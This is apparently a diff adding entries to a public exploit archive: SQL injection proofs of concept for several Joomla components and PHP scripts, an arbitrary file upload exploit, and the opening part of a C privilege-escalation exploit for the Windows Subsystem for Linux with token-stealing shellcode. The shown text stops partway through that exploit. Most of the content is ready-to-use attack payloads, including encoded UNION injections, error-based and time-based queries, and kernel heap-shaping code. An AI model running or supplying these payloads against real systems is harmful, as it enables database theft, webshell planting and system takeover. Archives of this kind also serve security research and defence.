+SQLi:
+
+https://localhost/[path]/view_pmt.php?id=9' AND 7768=7768 AND 'Vgmm'='Vgmm
+
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: id=9' AND 7768=7768 AND 'Vgmm'='Vgmm
+
+    Type: error-based
+    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
+    Payload: id=9' AND EXTRACTVALUE(1999,CONCAT(0x5c,0x7162707071,(SELECT (ELT(1999=1999,1))),0x716b6a7171)) AND 'dJCx'='dJCx
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 9 columns
+    Payload: id=-1179' UNION ALL SELECT NULL,NULL,CONCAT(0x7162707071,0x4c714c75756a7843774f4479627566597448726c6f51547a4d7a5766686345446b43587965626470,0x716b6a7171),NULL,NULL,NULL,NULL,NULL,NULL-- FLWW
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]
\ No newline at end of file
diff --git a/exploits/php/webapps/43948.html b/exploits/php/webapps/43948.html
new file mode 100644
index 000000000..ddb06c0b2
--- /dev/null
+++ b/exploits/php/webapps/43948.html
@@ -0,0 +1,33 @@
+<!--
+# # # # #
+# Exploit Title: Joomla! Component JE PayperVideo 3.0.0 - SQL Injection
+# Dork: N/A
+# Date: 01.02.2018
+# Vendor Homepage: http://www.jextn.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/je-paypervideo/
+# Software Download: http://www.jextn.com/index.php?option=com_docman&task=doc_download&gid=145&Itemid=276
+# Version: 3.0.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)	
+# # # # #
+-->
+<html>
+<body>
+<form action="http://localhost/[PATH]/index.php?option=com_jepaypervideo&view=myplans&task=myplans.usersubscriptions" method="post">
+<input name="usr_plan" value="(SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(1=1,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)" type="hidden">
+<input type="submit" value="Ver Ayari">
+</form>
+</body>
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/43949.txt b/exploits/php/webapps/43949.txt
new file mode 100644
index 000000000..3b1b6b2ff
--- /dev/null
+++ b/exploits/php/webapps/43949.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Event Manager PHP Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 01.02.2018
+# Vendor Homepage: http://ezcode.pt/
+# Software Link: https://codecanyon.net/item/eventmanager-php-script-admin-panel/21280741
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/event.php?id=[SQL]
+# 
+# 2)
+# http://localhost/[PATH]/page.php?slug=[SQL]
+# 	
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43950.txt b/exploits/php/webapps/43950.txt
new file mode 100644
index 000000000..cc076d773
--- /dev/null
+++ b/exploits/php/webapps/43950.txt
@@ -0,0 +1,26 @@
+# # # # #
+# Exploit Title: Joomla! Component JEXTN Reverse Auction 3.1.0 - SQL Injection
+# Dork: N/A
+# Date: 01.02.2018
+# Vendor Homepage: http://jextn.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/jextn-reverse-auction/
+# Version: 3.1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_jereverseauction&view=products&layout=default_message&tmpl=component&id=[SQL]&uid=1
+# 
+# %2d%31%20%20%2f%2a%21%30%38%38%38%38%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%30%38%38%38%38%53%45%4c%45%43%54%2a%2f%20%30%78%33%31%2c%30%78%33%32%2c%30%78%33%33%2c%30%78%33%34%2c%30%78%33%35%2c%28%53%65%6c%65%63%74%20%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%3a%3d%30%2c%28%73%65%6c%65%63%74%20%63%6f%75%6e%74%28%2a%29%66%72%6f%6d%28%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%63%6f%6c%75%6d%6e%73%29%77%68%65%72%65%40%3a%3d%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%2c%74%61%62%6c%65%5f%6e%61%6d%65%2c%30%78%33%63%36%63%36%39%33%65%2c%32%29%2c%63%6f%6c%75%6d%6e%5f%6e%61%6d%65%2c%30%78%61%33%61%2c%32%29%29%2c%40%2c%32%29%29%2d%2d%20%2d
+#  
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43957.txt b/exploits/php/webapps/43957.txt
new file mode 100644
index 000000000..3b79b4086
--- /dev/null
+++ b/exploits/php/webapps/43957.txt
@@ -0,0 +1,26 @@
+# # # # #
+# Exploit Title: Joomla! Component JEXTN Classified 1.0.0 - SQL Injection
+# Dork: N/A
+# Date: 01.02.2018
+# Vendor Homepage: http://jextn.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/classified-ads/jextn-classified/
+# Version: 1.0.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_jeclassifieds&view=boutique&sid=[SQL]
+# 
+# %2d%32%38%30%30%27%20%20%2f%2a%21%31%33%33%33%37%55%4e%49%4f%4e%2a%2f%28%2f%2a%21%31%33%33%33%37%53%45%4c%45%43%54%2a%2f%28%31%29%2c%28%32%29%2c%28%53%65%6c%65%63%74%20%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%3a%3d%30%2c%28%73%65%6c%65%63%74%20%63%6f%75%6e%74%28%2a%29%66%72%6f%6d%28%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%63%6f%6c%75%6d%6e%73%29%77%68%65%72%65%40%3a%3d%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%2c%74%61%62%6c%65%5f%6e%61%6d%65%2c%30%78%33%63%36%63%36%39%33%65%2c%32%29%2c%63%6f%6c%75%6d%6e%5f%6e%61%6d%65%2c%30%78%61%33%61%2c%32%29%29%2c%40%2c%32%29%29%2c%28%34%29%2c%28%35%29%2c%28%36%29%2c%28%37%29%2c%28%38%29%2c%28%39%29%2c%28%31%30%29%2c%28%31%31%29%2c%28%31%32%29%2c%28%31%33%29%2c%28%31%34%29%2c%28%31%35%29%2c%28%31%36%29%2c%28%31%37%29%2c%28%31%38%29%2c%28%31%39%29%2c%28%32%30%29%2c%28%32%31%29%2c%28%32%32%29%2c%28%32%33%29%2c%28%32%34%29%2c%28%32%35%29%2c%28%32%36%29%29%2d%2d%20%2d
+#  
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43958.txt b/exploits/php/webapps/43958.txt
new file mode 100644
index 000000000..c8d28d3ec
--- /dev/null
+++ b/exploits/php/webapps/43958.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Joomla! Component Jimtawl 2.2.5 - Arbitrary File Upload
+# Dork: N/A
+# Date: 01.02.2018
+# Vendor Homepage: http://janguo.de/
+# Software Link: https://extensions.joomla.org/extensions/extension/multimedia/streaming-a-broadcasting/jimtawl/
+# Software Download: http://janguo.de/lang-en/joomla-25-higher/jimtawl/pkg_jimtawl-2-2-5-current-r561-zip.raw
+# Version: 2.2.5
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker upload arbitrary file....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_jimtawl&view=upload&task=upload&pop=true&tmpl=component
+# 
+# http://localhost/[PATH]/media/efe_1517496506.php
+# 
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43959.txt b/exploits/php/webapps/43959.txt
new file mode 100644
index 000000000..ad60a7b16
--- /dev/null
+++ b/exploits/php/webapps/43959.txt
@@ -0,0 +1,71 @@
+# # # # #
+# Exploit Title: Joomla! Component JMS Music 1.1.1 - SQL Injection
+# Dork: N/A
+# Date: 01.02.2018
+# Vendor Homepage: https://www.joommasters.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/jms-music/
+# Version: 1.1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_jmsmusic&view=search&keyword=[SQL]
+# 
+# %45%66%65%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%36%36%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%2d%2d%20%56%65%72%41%79%61%72%69
+#  
+# Parameter: keyword (GET)
+#     Type: boolean-based blind
+#     Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+#     Payload: option=com_jmsmusic&view=search&keyword=-5694' OR 3737=3737#
+# 
+#     Type: error-based
+#     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+#     Payload: option=com_jmsmusic&view=search&keyword=Efe' AND (SELECT 5924 FROM(SELECT COUNT(*),CONCAT(0x7178787671,(SELECT (ELT(5924=5924,1))),0x716b626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- BeNf
+# 
+#     Type: AND/OR time-based blind
+#     Title: MySQL >= 5.0.12 OR time-based blind
+#     Payload: option=com_jmsmusic&view=search&keyword=Efe' OR SLEEP(5)-- EoWI
+# 
+# 2)
+# http://localhost/[PATH]/index.php?option=com_jmsmusic&view=search&artist=[SQL]
+# 
+# %27%20%20%2f%2a%21%30%32%32%32%32%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%30%32%32%32%32%53%45%4c%45%43%54%2a%2f%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2d%2d%20%2d
+# 
+# Parameter: artist (GET)
+#     Type: error-based
+#     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+#     Payload: option=com_jmsmusic&view=search&artist=Efe'||(SELECT 'ziQV' FROM DUAL WHERE 5411=5411 AND (SELECT 5581 FROM(SELECT COUNT(*),CONCAT(0x7170767171,(SELECT (ELT(5581=5581,1))),0x7170706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'
+# 
+#     Type: AND/OR time-based blind
+#     Title: MySQL >= 5.0.12 AND time-based blind
+#     Payload: option=com_jmsmusic&view=search&artist=Efe'||(SELECT 'xwge' FROM DUAL WHERE 8319=8319 AND SLEEP(5))||'
+# 
+# 3)
+# http://localhost/[PATH]/index.php?option=com_jmsmusic&view=search&username=[SQL]
+# 
+# %45%66%65%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%36%36%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%2d%2d%20%56%65%72%41%79%61%72%69
+# 
+# Parameter: username (GET)
+#     Type: boolean-based blind
+#     Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+#     Payload: option=com_jmsmusic&view=search&username=-1653' OR 6007=6007#
+# 
+#     Type: error-based
+#     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+#     Payload: option=com_jmsmusic&view=search&username=Efe' AND (SELECT 8019 FROM(SELECT COUNT(*),CONCAT(0x7171766b71,(SELECT (ELT(8019=8019,1))),0x7171767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- rMej
+# 
+#     Type: AND/OR time-based blind
+#     Title: MySQL >= 5.0.12 OR time-based blind
+#     Payload: option=com_jmsmusic&view=search&username=Efe' OR SLEEP(5)-- rhvR
+# 
+# # # # #
\ No newline at end of file
diff --git a/exploits/windows/local/43962.c b/exploits/windows/local/43962.c
new file mode 100644
index 000000000..98e44f600
--- /dev/null
+++ b/exploits/windows/local/43962.c
@@ -0,0 +1,450 @@
+#define _GNU_SOURCE
+
+#include <errno.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+#include <sys/types.h>
+#include <sys/mman.h>
+#include <unistd.h>
+#include <sys/ipc.h> 
+#include <sys/sem.h>
+#include <sys/shm.h>
+
+#define RING_SIZE				0x2000000
+#define PIPE_SIZE				0xb8
+#define PTR_SIZE				0x8
+#define STR_HDR_SIZE			0x18
+
+#define LEAK_OFFSET				0x68
+#define SHELLCODE_OFFSET		0x200
+#define CHUNK_LVXF_OFFSET		0x138f4296
+#define CR4_VAL_ADDR			0x506f8
+#define MAGIC_KEY				0xefef
+#define NT_OFFSET_TO_PIVOT		0x288005
+
+size_t curr_key 				= 0;
+
+char SHELLCODE[] = {
+	//0xcc,
+	0x90, 															// CLI
+	0x90, 															// PUSHFQ
+	0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90,  	// MOV RAX, Original Pointer
+	0x50, 															// PUSH RAX
+	0x51, 															// PUSH RCX
+	0x90, 0x90, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90,  	// MOV RCX, [OverwriteAddr+OverwriteOffset]
+	0x90, 0x90, 0x90,  												// MOV    QWORD PTR [RCX], RAX
+	0xb9, 0xfc, 0x11, 0x00, 0x00,  									// MOV ECX, PID
+
+	0x53, 															// PUSH RBX
+
+	0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,  			// MOV    RAX,QWORD PTR gs:0x188
+	0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00,						// MOV    RAX,QWORD PTR [RAX+0xb8] EPROCESS
+	0x48, 0x8d, 0x80, 0xe8, 0x02, 0x00, 0x00,						// LEA    RAX,[RAX+0xActiveProcessLinkOffset] 
+
+	//<tag>
+	0x48, 0x8b, 0x00,												// MOV    RAX,QWORD PTR [RAX]
+	0x48, 0x8b, 0x58, 0xf8,											// MOV    RBX,QWORD PTR [RAX-8] // UniqueProcessID
+	0x48, 0x83, 0xfb, 0x04,											// CMP    RBX,0x4
+	0x75, 0xf3,														// JNE    <tag>
+	0x48, 0x8b, 0x58, 0x70,											// MOV    RBX, QWORD PTR [RAX+0x70] // GET TOKEN of SYSTEM
+	0x90, 0x90, 0x90,
+	0x53, 															// PUSH RBX
+	//<tag2>
+	0x48, 0x8b, 0x00,												// MOV    RAX,QWORD PTR [RAX]
+	0x48, 0x8b, 0x58, 0xf8,											// MOV    RBX,QWORD PTR [RAX-8] // UniqueProcessID
+	0x39, 0xcb,														// CMP    EBX, ECX // our PID
+	0x75, 0xf5,														// JNE    <tag2>
+	0x5b, 															// POP RBX
+	0x48, 0x89, 0x58, 0x70,											// MOV    QWORD PTR[RAX +0x70], RBX
+	0x90, 0x90, 0x90,
+
+	0x5b, 															// POP RBX
+	0x59, 															// POP RCX
+	0x58, 															// POP RAX
+	0x90, 															// POPFQ
+
+	0xc3  															// RET
+};
+
+int calc_stop_idx(size_t alloc_size, size_t factor);
+int get_size_factor(size_t spray_size, size_t *factor);
+int trigger_corruption(int spray_size);
+int call_LxpUtilReadUserStringSet(size_t argc, size_t innerSize, char pattern, size_t stopIdx);
+int spray(size_t count);
+int alloc_sem(size_t factor);
+int free_sem(int key);
+char *get_faked_shm();
+void initialize_fake_obj(char *obj, char *shellcode_ptr, char *read_addr, size_t fake_shmid, size_t pid);
+void trigger_shm(size_t shmid);
+void print_shm(struct shmid_ds *buf);
+void *absolute_read(void* obj, size_t shmid, void *addr);
+int alloc_shm(size_t key);
+int shape(size_t *spray_size);
+
+int calc_stop_idx(size_t alloc_size, size_t factor) {
+	size_t totalStringsLength, headersLength;
+
+	totalStringsLength = (factor - 1) * 2 + 0xd001;
+	headersLength = (factor * STR_HDR_SIZE) % (0x100000000);
+
+	return (alloc_size + 496 + 0xc000) / STR_HDR_SIZE;
+}
+
+int get_size_factor(size_t spray_size, size_t *factor) {
+	if (spray_size != 0x2000000) {
+		printf("SPRAY_SIZE ISSUE\n");
+		exit(1);
+	}
+
+	*factor = 0xab13aff - 0x800*2;
+	return 0x15fffdfc;
+}
+
+int trigger_corruption(int spray_size) {
+	size_t factor = 0, alloc_size, stopIdx;
+	int ret;
+	alloc_size = get_size_factor(spray_size, &factor);
+	if (alloc_size < 0) {
+		printf("[*err*] unsupported spray_size == 0x%x", spray_size);
+		return -1;
+	}
+
+	stopIdx = calc_stop_idx(alloc_size, factor);
+
+	ret = call_LxpUtilReadUserStringSet(factor + 1, 1, 'O', stopIdx);
+	printf("[*] trigger_corruption() returned 0x%x\n", ret);
+	return 0;
+}
+
+int call_LxpUtilReadUserStringSet(size_t argc, size_t innerSize, char pattern, size_t stopIdx) {
+	char **argv, *innerBuf, *stopInnerBuf = NULL;
+	size_t pid;
+
+	argv = (char*)mmap(NULL, argc * sizeof(char*), PROT_READ | PROT_WRITE, 
+                    MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+	if(!argv) {
+		perror("[*err*] malloc argv failed\n"); 
+		return -1;
+	}
+
+	innerBuf = (char*)malloc(innerSize); 
+	if (!innerBuf) {
+		printf("[*err*] malloc innerBuf failed\n");
+		return -1;
+	}
+	memset(innerBuf, pattern, innerSize);
+
+	for(size_t i = 0; i < argc - 1; ++i) {
+		argv[i] = innerBuf;
+	}
+	argv[argc-1] = NULL;
+
+	pid = fork();
+	if (pid) {
+		// parent
+		if(stopIdx > 0) {
+			sleep(1.5);
+			printf("[*] set stopIdx, stopping wildcopy\n");
+			argv[stopIdx] = NULL;
+		}
+		return 0;
+	} else {
+		// son
+		argv[stopIdx - 1] = (char*)malloc(0xe000);
+		memset(argv[stopIdx - 1], "X", 0xd000-1);
+		argv[stopIdx - 1][0xd000-1] = '\0';
+
+		argv[stopIdx - 7] = (char*)malloc(0xe000);
+		memset(argv[stopIdx - 7], "X", 0xd000-1);
+		argv[stopIdx - 7][0xd000-1] = '\0';
+
+		// this execve is on nonsense "program", so it will return err.
+		// Just kill the thread.
+		execve(argv[0], argv, NULL);
+		exit(1);
+	}
+}
+
+/*
+	spray <count> chunks, and return number of total bytes allocated
+*/
+int spray(size_t count) {
+	int exec[2];
+	int pipe_capacity = 0, ret = 0;
+
+	for (size_t i = 0; i < count; ++i) {
+		if (pipe(exec) < 0) {
+			printf("[*err*] pipe\n");
+			ret = -1;
+			goto cleanup;
+		}		
+
+		pipe_capacity = fcntl(exec[1], F_SETPIPE_SZ, RING_SIZE);
+		if(pipe_capacity < 0) {
+			printf("[*err*] fcntl return neg capacity\n");
+			ret = -1;
+			goto cleanup;
+		}
+
+		ret += pipe_capacity;
+	}
+
+cleanup:
+	return ret;
+}
+
+/*
+	allocate 12 * v_nsems + 176
+*/
+int alloc_sem(size_t factor) {
+	int semid;
+  	int nsems = factor;
+
+  	semid = semget(curr_key++, nsems, IPC_CREAT | 0666);
+  	if(semid == -1) {
+  		printf("[*err*]semget failed, errno == 0x%x\n", errno);
+  		return -1;
+  	}
+
+	return semid;
+}
+
+int free_sem(int key) {
+	if(semctl(key, 0, IPC_RMID, 0) == -1) {
+		printf("[*err*] semctl failed, errno == 0x%x\n", errno);
+		return -1;
+    }
+    return 0;
+}
+
+char *get_faked_shm() {
+	size_t shellcode_length = 0;
+	char *obj = (char*)mmap(0xc000, 0x10000, PROT_READ|PROT_WRITE|PROT_EXEC,
+					MAP_SHARED | MAP_ANONYMOUS, -1, 0x0);
+	char *shellcode_ptr;
+
+	if (obj == (void*)-1) {
+		printf("[*err*] mmap failed\n");
+		return NULL;
+	}
+	char *cr4_addr = (char*)mmap(CR4_VAL_ADDR & ~0xfff, 0x10000, PROT_READ|PROT_WRITE|PROT_EXEC,
+					MAP_SHARED | MAP_ANONYMOUS, -1, 0x0);
+	if (cr4_addr == (void*)-1) {
+		printf("[*err*] mmap failed\n");
+		return NULL;
+	}
+	memset(cr4_addr, 0x0, 0x10000);
+
+	printf("[*] mmap userspace addr %p, set faked shm object\n", obj);
+
+	obj += 0x1000;
+	shellcode_ptr = obj + 0x200;
+	initialize_fake_obj(obj, shellcode_ptr, NULL, 0x41414141, -1);
+	return obj;
+}
+
+void initialize_fake_obj(char *obj, char *shellcode_ptr, char *read_addr, size_t fake_shmid, size_t pid) {
+	size_t val = 0x4141414141414141, val2 = 7, val3 = CR4_VAL_ADDR;
+	char *obj2 = obj+0x1000;
+
+	memset(obj - 0x100, 0x0, 0x1000);
+
+	memcpy(obj, &read_addr, sizeof(size_t));
+	memcpy((obj+0x10), &val, sizeof(size_t));
+
+	memcpy(obj - 0x20, &val2, sizeof(size_t));
+	memcpy(obj - 0x68, &obj, sizeof(char*));
+	memcpy(obj + 0x28, &shellcode_ptr, sizeof(char*));
+	memcpy(obj - 0x80, &obj, sizeof(char*));
+	memcpy((obj + 0x40), &val, sizeof(size_t));
+
+	memcpy(CR4_VAL_ADDR + 0x10, &fake_shmid, sizeof(size_t));
+	memcpy(CR4_VAL_ADDR - 0x20, &val2, sizeof(size_t));
+	memcpy(CR4_VAL_ADDR - 0x80, &val3, sizeof(char*));
+	memcpy(CR4_VAL_ADDR - 0x68, &val3, sizeof(char*));
+	memcpy(CR4_VAL_ADDR + 0x28, &shellcode_ptr, sizeof(char*));
+	memcpy((CR4_VAL_ADDR + 0x40), &val, sizeof(size_t));
+
+	memcpy(CR4_VAL_ADDR + 0x18, &val2, sizeof(size_t));						// refcount
+	memcpy((CR4_VAL_ADDR + 0x50), &obj2, sizeof(size_t));
+	memcpy((CR4_VAL_ADDR + 0x90), &val3, sizeof(size_t));
+
+	memcpy(obj + SHELLCODE_OFFSET, SHELLCODE, sizeof(SHELLCODE));
+	memcpy(obj + SHELLCODE_OFFSET + 28, &pid, 4);
+}
+
+void trigger_shm(size_t shmid) {
+	char *data;
+	data = shmat(shmid, (void*)0, 0);
+}
+
+void print_shm(struct shmid_ds *buf) {
+	printf ("\nThe USER ID = %p\n", buf->shm_perm.uid);
+	printf ("The GROUP ID = %p\n", buf->shm_perm.gid);
+	printf ("The creator's ID = %p\n", buf->shm_perm.cuid);
+	printf ("The creator's group ID = %p\n", buf->shm_perm.cgid);
+	printf ("The operation permissions = 0%o\n", buf->shm_perm.mode);
+	printf ("The slot usage sequence\n");
+	//printf ("number = 0%x\n", buf->shm_perm.seq);
+	//printf ("The key= 0%x\n", buf->shm_perm.key);
+	printf ("The segment size = %p\n", buf->shm_segsz);
+	printf ("The pid of last shmop = %p\n", buf->shm_lpid);
+	printf ("The pid of creator = %p\n", buf->shm_cpid);
+	printf ("The current # attached = %p\n", buf->shm_nattch);
+	printf("The last shmat time = %p\n", buf->shm_atime);
+	printf("The last shmdt time = %p\n", buf->shm_dtime);
+	printf("The last change time = %p\n", buf->shm_ctime);
+}
+
+void *absolute_read(void* obj, size_t shmid, void *addr) {
+	struct shmid_ds shm;
+	initialize_fake_obj(obj, obj + SHELLCODE_OFFSET, addr, shmid, -1);
+	shmctl(shmid, IPC_STAT, &shm);
+	return (void*)shm.shm_ctime;
+}
+
+int alloc_shm(size_t key) {
+	int shmid;
+	shmid = shmget(key, 1024, 0644 | IPC_CREAT);
+	return shmid;
+}
+
+int shape(size_t *spray_size) {
+	size_t keys[0x400];
+	int exec[2];
+	int sv[2];
+    char flag;
+
+	size_t bytes = 0, tofree = 0;
+	size_t factor,hole_size;
+	struct flock fl;
+	memset(&fl, 0, sizeof(fl));
+	pid_t pid, wpid;
+	int status;
+
+	if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) == -1) {
+		printf("[*err] socketpair failed\n");
+		return 1;
+	}
+
+	bytes = spray(1);
+	if (bytes == (size_t)-1) {
+		printf("[*err*] bytes < 0, are you root?\n");
+		return 1;
+	}
+
+	*spray_size = bytes;
+	hole_size = get_size_factor(*spray_size, &factor);
+
+	tofree = hole_size / (bytes / 1) + 1;
+
+	printf("[*] allocate holes before the workspace\n");
+	for (int i = 0; i < 0x400; ++i) {
+		keys[i] = alloc_sem(0x7000);
+	}
+	for (int i = 0; i < 0x20; ++i) {
+		alloc_sem(0x7000);
+	}
+	for (int i = 0; i < 0x2000; ++i) {
+		alloc_sem(4063);
+	}
+	for (int i = 0; i < 0x2000; ++i) {
+		alloc_sem(3);
+	}
+
+	pid = fork();
+	if (pid > 0) {
+		printf("[*] alloc 0xc pages groups, adjust to continuous allocations\n");
+		bytes = spray(5);
+		write(sv[1], "p", 1);
+		read(sv[1], &flag, 1);
+	} else {
+		// son
+		read(sv[0], &flag, 1);
+		printf("[*] alloc workspace pages\n");
+		bytes = spray(tofree);
+		printf("[*] finish allocate workspace allocations\n");
+		write(sv[0], "p", 1);
+	}
+
+	if (pid > 0) {
+		printf("[*] allocating (0xc - shm | shm) AFTER the workspace\n");
+		for (int i = 0; i < 0x100; ++i) {
+			alloc_sem(4061);
+			for (int j = 0; j < 0x5; ++j) {	
+				alloc_shm(i * 0x100 + j);
+			}
+		}
+		write(sv[1], "p", 1);
+	} else {
+		read(sv[0], &flag, 1);
+		printf("[*] free middle allocation, creating workspace freed\n");
+		exit(1);
+	}
+
+	while ((wpid = wait(&status)) > 0); 
+
+	printf("[*] free prepared holes, create little pages holes before the workspace\n");
+	for (int i = 0; i < 0x400; ++i) {
+		free_sem(keys[i]);
+	}
+	
+	return 0;
+}
+
+int main(int argc, char **argv) {
+	size_t spray_size = 0;
+	char *obj;
+	void *paged_pool_addr, *file_obj, *lxcore_addr, *nt_c_specific_handler;
+	void *nt_addr;
+
+	obj = get_faked_shm();
+
+	printf("[*] start shaping\n");
+	if (shape(&spray_size)) {
+		printf("[*err*] shape failed, exit\n");
+		return 1;
+	}
+
+	// if there is some shm with shmid==0, delete it
+	shmctl(0, IPC_RMID, NULL);
+
+	printf("[*] shape is done\n");
+	if (trigger_corruption(spray_size) < 0) {
+		printf("[*err*] internal error\n");
+		return 1;
+	}
+
+	sleep(8);
+
+	printf("[*] leak shm, with the corrupted shmid\n");
+	paged_pool_addr = absolute_read(obj, 1, NULL);
+
+	printf("[*] infoleak - PagedPool addr at %p\n", paged_pool_addr);
+	file_obj = absolute_read(obj, 0xffff, paged_pool_addr + CHUNK_LVXF_OFFSET - LEAK_OFFSET);
+	printf("[*] infoleak - fileObj addr at %p\n", file_obj);
+	lxcore_addr = absolute_read(obj, 0, file_obj - 0x68 - LEAK_OFFSET);
+	printf("[*] infoleak - lxcore!LxpSharedSectionFileType addr at %p\n", lxcore_addr);
+	nt_c_specific_handler = absolute_read(obj, 0, lxcore_addr + 0x8b90 - LEAK_OFFSET);
